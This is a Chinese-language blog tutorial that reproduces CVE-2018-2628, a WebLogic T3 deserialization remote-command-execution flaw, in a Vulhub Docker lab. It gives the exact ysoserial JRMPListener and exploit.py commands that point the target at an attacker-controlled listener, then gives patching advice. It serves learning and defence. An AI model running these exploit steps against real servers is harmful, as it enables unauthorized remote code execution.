Vulhub漏洞系列:Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)

最新推荐文章于 2024-09-07 09:54:48 发布
最新推荐文章于 2024-09-07 09:54:48 发布
阅读量3.5k 收藏
点赞数 1
分类专栏: vulhub漏洞复现系列 文章标签: docker weblogic
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43072923/article/details/120798336
版权

Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)

00.前言

这篇文章将对该漏洞进行简介并复现,同时简要说明Vulhub的使用方法,适合小白一起学习,大佬看看就好☺

01.简介

  Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。

影响版本:
Oracle WebLogic Server10.3.6.0
Oracle WebLogic Server12.2.1.2
Oracle WebLogic Server12.2.1.3
Oracle WebLogic Server12.1.3.0

参考链接:

02.漏洞描述

  远程攻击者可利用该漏洞在未授权的情况下发送攻击数据,通过T3协议(EJB支持远程访问,且支持多种协议。这是Web Container和EJB Container的主要区别)在Weblogic Server中执行反序列化操作,利用RMI(远程方法调用) 机制的缺陷,通过 JRMP 协议(Java Remote Messaging Protocol:java远程消息交换协议)达到执行任意反序列化 payload 的目的。

03.漏洞复现

  首先,在vulhub-master中漏洞的相应位置打开终端,输入docker-compose up -d打开环境:

  docker-compose up -d

  然后输入docker ps查看环境是否打开成功:

  docker ps

在这里插入图片描述

1、搭建好后访问http://yourip:7001/console查看是否搭建OK:
在这里插入图片描述2、接下来我们先下载反序列化工具ysoserial和该漏洞的exp,然后利用ysoserial启动JRMP Server,目的是为了使得触发漏洞后weblogic所在服务器可以远程调用执行特定的程序:

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]

其中,[command]即为我想执行的命令,而[listen port]是JRMP Server监听的端口。

试验中的IP:
靶机:192.168.10.139
攻击机kali:192.162.10.129

在kali运行以下命令:

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'touch /tmp/evil'

在这里插入图片描述
接着执行刚刚下载好的exp(python版本为2.7,exploit.py脚本只能在python2上执行),向目标Weblogic(http://your-ip:7001)发送数据包:

python exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]

  其中,[victim ip][victim port]是目标weblogic的IP和端口,[path to ysoserial]是本地ysoserial的路径,[JRMPListener ip][JRMPListener port]第一步中启动JRMP Server的IP地址和端口。[JRMPClient]是执行JRMPClient的类,可选的值是JRMPClientJRMPClient2

在kali运行下面的命令:

python exploit.py 192.168.10.139 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 192.168.10.129 1099 JRMPClient

在这里插入图片描述
可以查看刚刚的监听是否发送成功:

在这里插入图片描述
靶机接收后,我们进入docker容器验证,使用以下命令:

sudo docker exec -it d29e540b5e8e /bin/bash

其中d29e540b5e8e是该容器的id:

在这里插入图片描述
进入后,我们可以查看到在/tmp下,的确有evil存在,至此漏洞复现成功:

在这里插入图片描述
最后复现完漏洞就可以关闭环境了:

  docker-compose down

04.漏洞复现

  官方补丁:T3协议漏洞加固的话可以打上官方最新的补丁,可使用正版软件许可账户登录 https://support.oracle.com,下载最新补丁。
  手工修复:控制T3协议的访问权限来临时阻断漏洞利用。

结束语:这是抬锅整理出来的复现过程希望能对大家有帮助☺

ccooll_快乐的抬锅哟
关注
专栏目录
CVE-2018-2628Weblogic WLS Core Components 反序列化命令执行漏洞
weixin_45253622的博客
12-12 1808
漏洞简介 Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令漏洞原理 远程攻击者可利用该漏洞在未授权的情况下发送攻击数据,通过T3协议(EJB支持远程访问,且支持多种协议。这是Web Container和EJB Container的主要区别)在Weblogic Server中执行反序列化操作,利用RMI(远程方法调用) 机
CVE-2018-2628(Weblogic WLS Core Components (核心组件)反序列化命令执行漏洞)
Sea_Sand息禅
07-14 1087
vulhub上面复现的 一、环境搭建 docker-compose up -d //docker搭建环境 我们先访问这个环境:your-ip:7001,发现是404,这时环境还没搭建好,需要访问一下your-ip:7001/console,这里会自动进行一些环境部署,出现登录界面就是搭建完成了。 二、复现攻击 1、工具准备 1)java反序列化漏洞需要用到ysoserial http...
Weblogic WLS Core Components 反序列化命令执行漏洞CVE-2018-2628)复现
s1056481432的博客
08-02 855
漏洞介绍 Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令漏洞环境 我这里是直接用vulhub搭建环境的官网:https://vulhub.org/,使用方法很简单直接git clone https://github.com/vulhub/vulhub.git 就可以了,之后到下载的文件夹找到我们要复现的漏洞的文件夹
Weblogic WLS Core Components 反序列化命令执行漏洞CVE-2018-2628
huangyongkang666的博客
07-25 671
Weblogic WLS Core Components 反序列化命令执行漏洞CVE-2018-2628
WebLogic CVE-2018-2628漏洞补丁修复指南
最新发布
weixin_33256096的博客
09-07 1019
本文还有配套的精品资源,点击获取 简介:WebLogic作为Oracle企业级应用服务器,面临严重的反序列化漏洞CVE-2018-2628,可导致远程代码执行。此漏洞源于服务器未正确验证反序列化数据,允许攻击者通过恶意构造的对象控制服务器。本文介绍了针对CVE-2018-2628的补丁安装步骤,包含下载、验证、停止服务、应用补丁、配置、重启服务及验证等环节。同时,强调了定期...
[Vulhub] Apache Shiro 反序列化漏洞(shiro-550,shiro-721)
weixin_45605352的博客
05-15 3022
0x00 漏洞描述 Apache Shiro是一款开源强大且易用的Java安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。 Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。 0x01 影响版本 Apache Shiro <= 1.2.4 漏洞特征: shiro反序列
Weblogic CVE-2018-2628 T3协议反序列化命令执行漏洞
读书 买花 长大
02-19 1011
CVE-2018-2628
CVE-2018-2628 weblogic WLS反序列化漏洞--RCE学习笔记
weixin_30662011的博客
04-18 190
weblogic WLS 反序列化漏洞学习 鸣谢 感谢POC和分析文档的作者-绿盟大佬=>liaoxinxi;感谢群内各位大佬及时传播了分析文档,我才有幸能看到。 漏洞简介 漏洞威胁:RCE--远程代码执行 漏洞组件:weblogic 影响版本:10.3.6.0、12.1.3.0、12.2.1.2、12.2.1.3 温馨提示:对于攻击者自己构造的新的payload,还没有被or...
Weblogic WLS Core Components 反序列化命令执行漏洞复现(CVE-2018-2628
yang1234567898的博客
04-21 534
Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令漏洞产生原因: 攻击者利用其他rmi绕过weblogic黑名单限制,然后在将加载的内容利用readObject解析,从而造成反序列化远程代码执行漏洞,该漏洞主要由于T3服务触发,所有开放weblogic控制台7001端口,默认会开启T3服务,攻击者发送构造好的T3协议
weblogic10.36 CVE-2018-2893补丁文件
08-02
WebLogicCVE-2018-2893)安全漏洞预警,oracle官方发布了2018年4月份的关键补丁更新CPU(CriticalPatchUpdate),其中包含一个高危的Weblogic反序列化漏洞(CVE-2018-2628),因该漏洞修补不善导致被绕过。...
Weblogic反序列化远程代码执行漏洞(CVE-2018-2628) 补丁包
08-17
Oracle Fusion Middleware Oracle WebLogic Server组件安全漏洞,这个是weblogic12.1.3.0 版本的补丁包,有需要的可以下载
WLS Core Components反序列化命令执行漏洞CVE-2018-2628
wcl20010的博客
05-24 625
目录 原理 影响版本: 常规利用方式: 信息收集 漏洞检测方法 攻击操作 另一种方式 exp利用方式 原理 远程攻击者可利用该漏洞在未授权的情况下发送攻击数据,通过T3协议(EJB支持远程访问,且支持多种协议。这是Web Container和EJB Container的主要区别)在Weblogic Server中执行反序列化操作,利用RMI(远程方法调用) 机制的缺陷,通过 JRMP 协议(Java Remote Messaging Protocol:java远程消息交换协议)达到执行
WebLogic T3 反序列化绕过漏洞(CVE-2018-2893)检测POC
IT界迷者Blog--
10-17 6949
WebLogic T3 反序列化绕过漏洞(CVE-2018-2893)检测POC #!env python # -*- coding: utf-8 -*- import socket import time import re import sys VUL=['CVE-2018-2893'] #remote ip changed to :127.0.0.1 PAYLOAD=['ACED0005...
21 - vulhub - fastjson 反序列化导致任意命令执行漏洞
易编橙 · 终身成长社群,相遇已是上上签!
11-16 1093
fastjson 阿里巴巴开发的一个JSON解析库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。 Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。
03 - vulhub - Apereo CAS 4.1 反序列化命令执行漏洞
易编橙 · 终身成长社群,相遇已是上上签!
09-23 711
Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令
vulhub weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271)
qaq517384的博客
07-06 957
影响版本 复现 启动环境 访问 python3 ws.py -t url 构造poc bp抓包发送 查看效果 构造反弹shell的poc 发送请求 成功反弹shell
验证WebLogic CVE-2018-2628漏洞的POC工具使用
- CVE-2018-2628是一个远程代码执行漏洞,攻击者可以未经认证远程执行代码。 - 通过PoC脚本验证漏洞WebLogic服务器中特定端点的响应能帮助识别漏洞存在。 - PoC脚本通常用Python编写,如提供的`weblogic_poc.cve-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值